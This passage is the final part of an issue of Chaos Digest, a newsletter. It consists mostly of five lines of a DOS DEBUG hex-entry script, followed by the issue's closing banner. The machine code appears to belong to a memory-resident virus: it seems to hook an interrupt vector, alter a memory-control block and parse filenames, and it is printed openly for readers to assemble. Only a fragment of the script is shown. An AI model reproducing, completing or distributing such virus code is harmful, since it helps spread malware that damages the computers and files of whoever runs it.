  801. e 04E0  74 06 B8 31 67 EB 37 90 1E B8 00 00 8E D8 FA C7
  802. e 04F0  06 70 00 DA 01 8C 0E 72 00 FB 1F 2E C6 06 39 07
  803. e 0500  01 EB 1B 90 E8 1B 00 75 03 E8 5E 00 E8 6E 02 9D
  804. e 0510  E8 4D 00 9C 1E E8 70 02 C6 06 00 00 5A 1F 9D CA
  805. e 0520  02 00 50 56 8B F2 AC 84 C0 74 24 3C 2E 75 F7 E8
  806.  
  807. ------------------------------
  808.  
  809. End of Chaos Digest #1.39
  810. ************************************
  811.